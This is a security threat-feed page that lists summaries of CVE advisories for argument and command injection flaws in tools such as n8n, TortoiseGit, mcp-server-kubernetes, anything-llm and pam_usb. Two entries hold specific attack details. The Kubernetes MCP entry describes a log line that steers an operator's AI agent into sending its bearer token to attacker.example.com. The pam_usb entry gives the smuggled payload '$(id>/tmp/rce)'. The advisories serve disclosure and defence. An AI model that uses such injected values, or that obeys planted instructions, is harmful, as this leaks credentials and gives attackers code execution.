Threats Tagged 'cwe-88'
View all threats tagged with 'cwe-88'. Filter and sort to focus on specific types of threats.
Stop chasing alerts. Route them.
Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.
Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)
API access activates after upgrading in Console -> Billing.
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.
Filter Threats
Narrow down the results by type, severity, or affected countries
Threats Tagged 'cwe-88'
Click on any threat for detailed analysis and mitigation recommendations
CVE-2026-11968: CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in TortoiseGit team TortoiseGitCVE-2026-11968 0 Argument Injection in TortoiseGitBlame via Malicious Git History Filenames Leads to Arbitrary File Write in TortoiseGit Join the discussion | CVE Database V5 | 06/24/2026, 09:33:49 UTC Added: 06/24/2026, 10:09:37 UTC |
CVE-2026-44790: CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in n8n-io n8nCVE-2026-44790 0 n8n is an open source workflow automation platform. Prior to 1.123.43, 2.22.1, and 2.20.7, an authenticated user with permission to create or modify workflows could inject CLI flags on the Git node's Push operation allowing an attacker to read arbitrary files from the n8n server potentially leading to full compromise. This vulnerability is fixed in 1.123.43, 2.22.1, and 2.20.7. Join the discussion | CVE Database V5 | 06/23/2026, 15:53:13 UTC Added: 06/23/2026, 16:39:52 UTC |
CVE-2026-12530: CWE-88 Improper neutralization of argument delimiters in a command ('argument injection') in AWS bedrock-agentcoreCVE-2026-12530 0 Improper neutralization of argument delimiters in the install_packages() method in AWS Bedrock AgentCore Python SDK versions >= 1.1.3 and < 1.6.1 might allow a remote authenticated user to execute arbitrary commands within the Code Interpreter sandbox via crafted package name arguments. To mitigate this issue, users should upgrade to version 1.6.1. Join the discussion | CVE Database V5 | 06/17/2026, 21:05:00 UTC Added: 06/20/2026, 18:26:31 UTC |
CVE-2026-47365: CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in WebPros WordPress-ToolkitCVE-2026-47365 0 Argument injection vulnerability in WordPress Toolkit before 6.11.0 as used in cPanel & WHM, allows remote authenticated users to bypass cross-tenant authorization and execute arbitrary wp-toolkit CLI commands as another account. Join the discussion | CVE Database V5 | 06/12/2026, 02:27:43 UTC Added: 06/12/2026, 03:30:07 UTC |
CVE-2026-47250: CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in Flux159 mcp-server-kubernetesCVE-2026-47250 0 mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0. Join the discussion | CVE Database V5 | 06/11/2026, 18:35:50 UTC Added: 06/11/2026, 19:00:43 UTC |
Red Hat Security Advisory: evince security updateCVE-2026-46529 0 The evince packages provide a simple multi-page document viewer for Portable Document Format (PDF), PostScript (PS), Encapsulated PostScript (EPS) files, and, with additional back-ends, also the Device Independent File format (DVI) files. Security Fix(es): * atril: evince: xreader: PDF /GoToR action argv injection enables single-click RCE via --gtk-module dlopen (CVE-2026-46529) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Join the discussion | GCVE Database | 06/22/2026, 11:15:16 UTC Added: 06/06/2026, 21:13:41 UTC |
CVE-2026-41013: CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in CloudFoundry Foundation smb-volume-releaseCVE-2026-41013 0 Input validation bypass in SMB volume mount handling in CloudFoundry Foundation diego-release allows low-privileged CF space developer to inject arbitrary kernel CIFS mount options via bypassing the mount-option allowlist, enabling privilege escalation and security control bypass on multi-tenant Diego cells. Affected versions: smb-volume-release: All versions prior to v3.60.0 CF Deployment: All versions prior to v56.0.0 Join the discussion | CVE Database V5 | 06/01/2026, 17:36:47 UTC Added: 06/01/2026, 19:52:38 UTC |
CVE-2026-49373: CWE-88 in JetBrains TeamCityCVE-2026-49373 0 CVE-2026-49373 is a high-severity vulnerability in JetBrains TeamCity before version 2026.1 that allows remote code execution via Perforce connection settings. The vulnerability is classified under CWE-88, which relates to improper neutralization of commands or arguments. There is no official patch or remediation level currently confirmed, and no known exploits in the wild have been reported. The vulnerability requires at least low privileges and no user interaction to exploit, with a high impact on confidentiality but limited impact on integrity and no impact on availability. Join the discussion | CVE Database V5 | 05/29/2026, 18:15:48 UTC Added: 05/29/2026, 18:33:46 UTC |
CVE-2026-48116: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') in Mintplex-Labs anything-llmCVE-2026-48116 0 CVE-2026-48116 is a command injection vulnerability in Mintplex-Labs anything-llm versions prior to 1.13.0. The issue arises because the filesystem-search-files agent skill passes an LLM-controlled pattern parameter to ripgrep without using an end-of-options separator, allowing specially crafted patterns to be interpreted as command options. This enables an attacker who can interact with the agent and has the filesystem plugin enabled to execute arbitrary commands inside the server container. The vulnerability is fixed in version 1.13.0. Join the discussion | CVE Database V5 | 05/28/2026, 21:19:51 UTC Added: 05/28/2026, 21:33:34 UTC |
CVE-2026-44712: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in mcdope pam_usbCVE-2026-44712 0 pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, a crafted UUID such as $(id>/tmp/rce) in the config causes root RCE when pamusb-conf --reset-pads is run. A USB device with a crafted filesystem UUID (some controllers allow this) can inject the payload at --add-device time. Also, userName from the XML config is passed to os.system() in pamusb-agent, which invokes a shell. This vulnerability is fixed in 0.8.7. Join the discussion | CVE Database V5 | 05/27/2026, 20:24:23 UTC Added: 05/27/2026, 21:03:35 UTC |
Showing 1 to 10 of 12 results